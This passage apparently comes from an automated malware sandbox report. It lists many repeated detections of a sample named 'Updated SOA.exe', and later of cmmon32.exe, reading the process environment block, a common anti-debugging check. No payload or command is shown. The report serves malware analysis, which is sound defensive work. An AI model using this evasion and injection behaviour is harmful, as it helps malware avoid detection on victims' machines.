          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0112B260 mov eax, dword ptr fs:[00000030h]7_2_0112B260
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0112B260 mov eax, dword ptr fs:[00000030h]7_2_0112B260
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01148A62 mov eax, dword ptr fs:[00000030h]7_2_01148A62
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AD294 mov eax, dword ptr fs:[00000030h]7_2_010AD294
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AD294 mov eax, dword ptr fs:[00000030h]7_2_010AD294
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010752A5 mov eax, dword ptr fs:[00000030h]7_2_010752A5
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010752A5 mov eax, dword ptr fs:[00000030h]7_2_010752A5
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010752A5 mov eax, dword ptr fs:[00000030h]7_2_010752A5
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010752A5 mov eax, dword ptr fs:[00000030h]7_2_010752A5
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010752A5 mov eax, dword ptr fs:[00000030h]7_2_010752A5
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0108AAB0 mov eax, dword ptr fs:[00000030h]7_2_0108AAB0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0108AAB0 mov eax, dword ptr fs:[00000030h]7_2_0108AAB0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AFAB0 mov eax, dword ptr fs:[00000030h]7_2_010AFAB0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A2ACB mov eax, dword ptr fs:[00000030h]7_2_010A2ACB
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A2AE4 mov eax, dword ptr fs:[00000030h]7_2_010A2AE4
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01134AEF mov eax, dword ptr fs:[00000030h]7_2_01134AEF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01134AEF mov eax, dword ptr fs:[00000030h]7_2_01134AEF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01134AEF mov eax, dword ptr fs:[00000030h]7_2_01134AEF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01134AEF mov eax, dword ptr fs:[00000030h]7_2_01134AEF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01134AEF mov eax, dword ptr fs:[00000030h]7_2_01134AEF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01134AEF mov eax, dword ptr fs:[00000030h]7_2_01134AEF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01134AEF mov eax, dword ptr fs:[00000030h]7_2_01134AEF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01134AEF mov eax, dword ptr fs:[00000030h]7_2_01134AEF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01134AEF mov eax, dword ptr fs:[00000030h]7_2_01134AEF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01134AEF mov eax, dword ptr fs:[00000030h]7_2_01134AEF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01134AEF mov eax, dword ptr fs:[00000030h]7_2_01134AEF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01134AEF mov eax, dword ptr fs:[00000030h]7_2_01134AEF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01134AEF mov eax, dword ptr fs:[00000030h]7_2_01134AEF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01134AEF mov eax, dword ptr fs:[00000030h]7_2_01134AEF
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01148D34 mov eax, dword ptr fs:[00000030h]7_2_01148D34
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0113E539 mov eax, dword ptr fs:[00000030h]7_2_0113E539
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A4D3B mov eax, dword ptr fs:[00000030h]7_2_010A4D3B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A4D3B mov eax, dword ptr fs:[00000030h]7_2_010A4D3B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A4D3B mov eax, dword ptr fs:[00000030h]7_2_010A4D3B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0107AD30 mov eax, dword ptr fs:[00000030h]7_2_0107AD30
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010FA537 mov eax, dword ptr fs:[00000030h]7_2_010FA537
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01083D34 mov eax, dword ptr fs:[00000030h]7_2_01083D34
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01083D34 mov eax, dword ptr fs:[00000030h]7_2_01083D34
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01083D34 mov eax, dword ptr fs:[00000030h]7_2_01083D34
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01083D34 mov eax, dword ptr fs:[00000030h]7_2_01083D34
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01083D34 mov eax, dword ptr fs:[00000030h]7_2_01083D34
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01083D34 mov eax, dword ptr fs:[00000030h]7_2_01083D34
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01083D34 mov eax, dword ptr fs:[00000030h]7_2_01083D34
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01083D34 mov eax, dword ptr fs:[00000030h]7_2_01083D34
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01083D34 mov eax, dword ptr fs:[00000030h]7_2_01083D34
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01083D34 mov eax, dword ptr fs:[00000030h]7_2_01083D34
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01083D34 mov eax, dword ptr fs:[00000030h]7_2_01083D34
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01083D34 mov eax, dword ptr fs:[00000030h]7_2_01083D34
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01083D34 mov eax, dword ptr fs:[00000030h]7_2_01083D34
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B3D43 mov eax, dword ptr fs:[00000030h]7_2_010B3D43
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010F3540 mov eax, dword ptr fs:[00000030h]7_2_010F3540
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01123D40 mov eax, dword ptr fs:[00000030h]7_2_01123D40
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01097D50 mov eax, dword ptr fs:[00000030h]7_2_01097D50
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109C577 mov eax, dword ptr fs:[00000030h]7_2_0109C577
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109C577 mov eax, dword ptr fs:[00000030h]7_2_0109C577
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A2581 mov eax, dword ptr fs:[00000030h]7_2_010A2581
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A2581 mov eax, dword ptr fs:[00000030h]7_2_010A2581
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A2581 mov eax, dword ptr fs:[00000030h]7_2_010A2581
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A2581 mov eax, dword ptr fs:[00000030h]7_2_010A2581
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01072D8A mov eax, dword ptr fs:[00000030h]7_2_01072D8A
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01072D8A mov eax, dword ptr fs:[00000030h]7_2_01072D8A
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01072D8A mov eax, dword ptr fs:[00000030h]7_2_01072D8A
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01072D8A mov eax, dword ptr fs:[00000030h]7_2_01072D8A
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01072D8A mov eax, dword ptr fs:[00000030h]7_2_01072D8A
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AFD9B mov eax, dword ptr fs:[00000030h]7_2_010AFD9B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AFD9B mov eax, dword ptr fs:[00000030h]7_2_010AFD9B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01132D82 mov eax, dword ptr fs:[00000030h]7_2_01132D82
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01132D82 mov eax, dword ptr fs:[00000030h]7_2_01132D82
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01132D82 mov eax, dword ptr fs:[00000030h]7_2_01132D82
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01132D82 mov eax, dword ptr fs:[00000030h]7_2_01132D82
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01132D82 mov eax, dword ptr fs:[00000030h]7_2_01132D82
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01132D82 mov eax, dword ptr fs:[00000030h]7_2_01132D82
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01132D82 mov eax, dword ptr fs:[00000030h]7_2_01132D82
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A35A1 mov eax, dword ptr fs:[00000030h]7_2_010A35A1
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_011405AC mov eax, dword ptr fs:[00000030h]7_2_011405AC
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_011405AC mov eax, dword ptr fs:[00000030h]7_2_011405AC
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A1DB5 mov eax, dword ptr fs:[00000030h]7_2_010A1DB5
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A1DB5 mov eax, dword ptr fs:[00000030h]7_2_010A1DB5
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A1DB5 mov eax, dword ptr fs:[00000030h]7_2_010A1DB5
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010F6DC9 mov eax, dword ptr fs:[00000030h]7_2_010F6DC9
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010F6DC9 mov eax, dword ptr fs:[00000030h]7_2_010F6DC9
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010F6DC9 mov eax, dword ptr fs:[00000030h]7_2_010F6DC9
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010F6DC9 mov ecx, dword ptr fs:[00000030h]7_2_010F6DC9
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010F6DC9 mov eax, dword ptr fs:[00000030h]7_2_010F6DC9
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010F6DC9 mov eax, dword ptr fs:[00000030h]7_2_010F6DC9
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01128DF1 mov eax, dword ptr fs:[00000030h]7_2_01128DF1
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0108D5E0 mov eax, dword ptr fs:[00000030h]7_2_0108D5E0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0108D5E0 mov eax, dword ptr fs:[00000030h]7_2_0108D5E0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0113FDE2 mov eax, dword ptr fs:[00000030h]7_2_0113FDE2
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0113FDE2 mov eax, dword ptr fs:[00000030h]7_2_0113FDE2
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0113FDE2 mov eax, dword ptr fs:[00000030h]7_2_0113FDE2
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0113FDE2 mov eax, dword ptr fs:[00000030h]7_2_0113FDE2
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010F6C0A mov eax, dword ptr fs:[00000030h]7_2_010F6C0A
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010F6C0A mov eax, dword ptr fs:[00000030h]7_2_010F6C0A
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010F6C0A mov eax, dword ptr fs:[00000030h]7_2_010F6C0A
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010F6C0A mov eax, dword ptr fs:[00000030h]7_2_010F6C0A
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01131C06 mov eax, dword ptr fs:[00000030h]7_2_01131C06
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01131C06 mov eax, dword ptr fs:[00000030h]7_2_01131C06
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01131C06 mov eax, dword ptr fs:[00000030h]7_2_01131C06
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01131C06 mov eax, dword ptr fs:[00000030h]7_2_01131C06
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01131C06 mov eax, dword ptr fs:[00000030h]7_2_01131C06
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01131C06 mov eax, dword ptr fs:[00000030h]7_2_01131C06
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01131C06 mov eax, dword ptr fs:[00000030h]7_2_01131C06
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01131C06 mov eax, dword ptr fs:[00000030h]7_2_01131C06
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01131C06 mov eax, dword ptr fs:[00000030h]7_2_01131C06
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01131C06 mov eax, dword ptr fs:[00000030h]7_2_01131C06
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01131C06 mov eax, dword ptr fs:[00000030h]7_2_01131C06
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01131C06 mov eax, dword ptr fs:[00000030h]7_2_01131C06
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01131C06 mov eax, dword ptr fs:[00000030h]7_2_01131C06
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01131C06 mov eax, dword ptr fs:[00000030h]7_2_01131C06
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0114740D mov eax, dword ptr fs:[00000030h]7_2_0114740D
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0114740D mov eax, dword ptr fs:[00000030h]7_2_0114740D
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0114740D mov eax, dword ptr fs:[00000030h]7_2_0114740D
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010ABC2C mov eax, dword ptr fs:[00000030h]7_2_010ABC2C
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0110C450 mov eax, dword ptr fs:[00000030h]7_2_0110C450
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0110C450 mov eax, dword ptr fs:[00000030h]7_2_0110C450
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AA44B mov eax, dword ptr fs:[00000030h]7_2_010AA44B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109746D mov eax, dword ptr fs:[00000030h]7_2_0109746D
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AAC7B mov eax, dword ptr fs:[00000030h]7_2_010AAC7B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AAC7B mov eax, dword ptr fs:[00000030h]7_2_010AAC7B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AAC7B mov eax, dword ptr fs:[00000030h]7_2_010AAC7B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AAC7B mov eax, dword ptr fs:[00000030h]7_2_010AAC7B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AAC7B mov eax, dword ptr fs:[00000030h]7_2_010AAC7B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AAC7B mov eax, dword ptr fs:[00000030h]7_2_010AAC7B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AAC7B mov eax, dword ptr fs:[00000030h]7_2_010AAC7B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AAC7B mov eax, dword ptr fs:[00000030h]7_2_010AAC7B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AAC7B mov eax, dword ptr fs:[00000030h]7_2_010AAC7B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AAC7B mov eax, dword ptr fs:[00000030h]7_2_010AAC7B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AAC7B mov eax, dword ptr fs:[00000030h]7_2_010AAC7B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109B477 mov eax, dword ptr fs:[00000030h]7_2_0109B477
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109B477 mov eax, dword ptr fs:[00000030h]7_2_0109B477
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109B477 mov eax, dword ptr fs:[00000030h]7_2_0109B477
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109B477 mov eax, dword ptr fs:[00000030h]7_2_0109B477
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109B477 mov eax, dword ptr fs:[00000030h]7_2_0109B477
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109B477 mov eax, dword ptr fs:[00000030h]7_2_0109B477
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109B477 mov eax, dword ptr fs:[00000030h]7_2_0109B477
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109B477 mov eax, dword ptr fs:[00000030h]7_2_0109B477
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109B477 mov eax, dword ptr fs:[00000030h]7_2_0109B477
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109B477 mov eax, dword ptr fs:[00000030h]7_2_0109B477
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109B477 mov eax, dword ptr fs:[00000030h]7_2_0109B477
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109B477 mov eax, dword ptr fs:[00000030h]7_2_0109B477
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01134496 mov eax, dword ptr fs:[00000030h]7_2_01134496
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01134496 mov eax, dword ptr fs:[00000030h]7_2_01134496
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01134496 mov eax, dword ptr fs:[00000030h]7_2_01134496
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01134496 mov eax, dword ptr fs:[00000030h]7_2_01134496
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01134496 mov eax, dword ptr fs:[00000030h]7_2_01134496
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01134496 mov eax, dword ptr fs:[00000030h]7_2_01134496
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01134496 mov eax, dword ptr fs:[00000030h]7_2_01134496
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01134496 mov eax, dword ptr fs:[00000030h]7_2_01134496
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01134496 mov eax, dword ptr fs:[00000030h]7_2_01134496
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01134496 mov eax, dword ptr fs:[00000030h]7_2_01134496
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01134496 mov eax, dword ptr fs:[00000030h]7_2_01134496
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01134496 mov eax, dword ptr fs:[00000030h]7_2_01134496
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01134496 mov eax, dword ptr fs:[00000030h]7_2_01134496
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0108849B mov eax, dword ptr fs:[00000030h]7_2_0108849B
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01148CD6 mov eax, dword ptr fs:[00000030h]7_2_01148CD6
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_011314FB mov eax, dword ptr fs:[00000030h]7_2_011314FB
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010F6CF0 mov eax, dword ptr fs:[00000030h]7_2_010F6CF0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010F6CF0 mov eax, dword ptr fs:[00000030h]7_2_010F6CF0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010F6CF0 mov eax, dword ptr fs:[00000030h]7_2_010F6CF0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0110FF10 mov eax, dword ptr fs:[00000030h]7_2_0110FF10
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0110FF10 mov eax, dword ptr fs:[00000030h]7_2_0110FF10
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AA70E mov eax, dword ptr fs:[00000030h]7_2_010AA70E
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AA70E mov eax, dword ptr fs:[00000030h]7_2_010AA70E
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0114070D mov eax, dword ptr fs:[00000030h]7_2_0114070D
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0114070D mov eax, dword ptr fs:[00000030h]7_2_0114070D
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109F716 mov eax, dword ptr fs:[00000030h]7_2_0109F716
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01074F2E mov eax, dword ptr fs:[00000030h]7_2_01074F2E
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01074F2E mov eax, dword ptr fs:[00000030h]7_2_01074F2E
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109B73D mov eax, dword ptr fs:[00000030h]7_2_0109B73D
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109B73D mov eax, dword ptr fs:[00000030h]7_2_0109B73D
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AE730 mov eax, dword ptr fs:[00000030h]7_2_010AE730
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0108EF40 mov eax, dword ptr fs:[00000030h]7_2_0108EF40
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0108FF60 mov eax, dword ptr fs:[00000030h]7_2_0108FF60
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01148F6A mov eax, dword ptr fs:[00000030h]7_2_01148F6A
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010F7794 mov eax, dword ptr fs:[00000030h]7_2_010F7794
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010F7794 mov eax, dword ptr fs:[00000030h]7_2_010F7794
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010F7794 mov eax, dword ptr fs:[00000030h]7_2_010F7794
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01088794 mov eax, dword ptr fs:[00000030h]7_2_01088794
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B37F5 mov eax, dword ptr fs:[00000030h]7_2_010B37F5
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0107C600 mov eax, dword ptr fs:[00000030h]7_2_0107C600
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0107C600 mov eax, dword ptr fs:[00000030h]7_2_0107C600
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0107C600 mov eax, dword ptr fs:[00000030h]7_2_0107C600
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A8E00 mov eax, dword ptr fs:[00000030h]7_2_010A8E00
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AA61C mov eax, dword ptr fs:[00000030h]7_2_010AA61C
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010AA61C mov eax, dword ptr fs:[00000030h]7_2_010AA61C
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01131608 mov eax, dword ptr fs:[00000030h]7_2_01131608
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0107E620 mov eax, dword ptr fs:[00000030h]7_2_0107E620
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0112FE3F mov eax, dword ptr fs:[00000030h]7_2_0112FE3F
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01087E41 mov eax, dword ptr fs:[00000030h]7_2_01087E41
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01087E41 mov eax, dword ptr fs:[00000030h]7_2_01087E41
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01087E41 mov eax, dword ptr fs:[00000030h]7_2_01087E41
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01087E41 mov eax, dword ptr fs:[00000030h]7_2_01087E41
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01087E41 mov eax, dword ptr fs:[00000030h]7_2_01087E41
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01087E41 mov eax, dword ptr fs:[00000030h]7_2_01087E41
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0113AE44 mov eax, dword ptr fs:[00000030h]7_2_0113AE44
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0113AE44 mov eax, dword ptr fs:[00000030h]7_2_0113AE44
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0108766D mov eax, dword ptr fs:[00000030h]7_2_0108766D
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109AE73 mov eax, dword ptr fs:[00000030h]7_2_0109AE73
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109AE73 mov eax, dword ptr fs:[00000030h]7_2_0109AE73
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109AE73 mov eax, dword ptr fs:[00000030h]7_2_0109AE73
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109AE73 mov eax, dword ptr fs:[00000030h]7_2_0109AE73
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0109AE73 mov eax, dword ptr fs:[00000030h]7_2_0109AE73
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0110FE87 mov eax, dword ptr fs:[00000030h]7_2_0110FE87
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010F46A7 mov eax, dword ptr fs:[00000030h]7_2_010F46A7
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01140EA5 mov eax, dword ptr fs:[00000030h]7_2_01140EA5
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01140EA5 mov eax, dword ptr fs:[00000030h]7_2_01140EA5
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01140EA5 mov eax, dword ptr fs:[00000030h]7_2_01140EA5
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_01148ED6 mov eax, dword ptr fs:[00000030h]7_2_01148ED6
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A36CC mov eax, dword ptr fs:[00000030h]7_2_010A36CC
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010B8EC7 mov eax, dword ptr fs:[00000030h]7_2_010B8EC7
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_0112FEC0 mov eax, dword ptr fs:[00000030h]7_2_0112FEC0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010A16E0 mov ecx, dword ptr fs:[00000030h]7_2_010A16E0
          Source: C:\Users\user\Desktop\Updated SOA.exeCode function: 7_2_010876E2 mov eax, dword ptr fs:[00000030h]7_2_010876E2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0440A44B mov eax, dword ptr fs:[00000030h]18_2_0440A44B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0446C450 mov eax, dword ptr fs:[00000030h]18_2_0446C450
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 18_2_0446C450 mov eax, dword ptr fs:[00000030h]18_2_0446C450
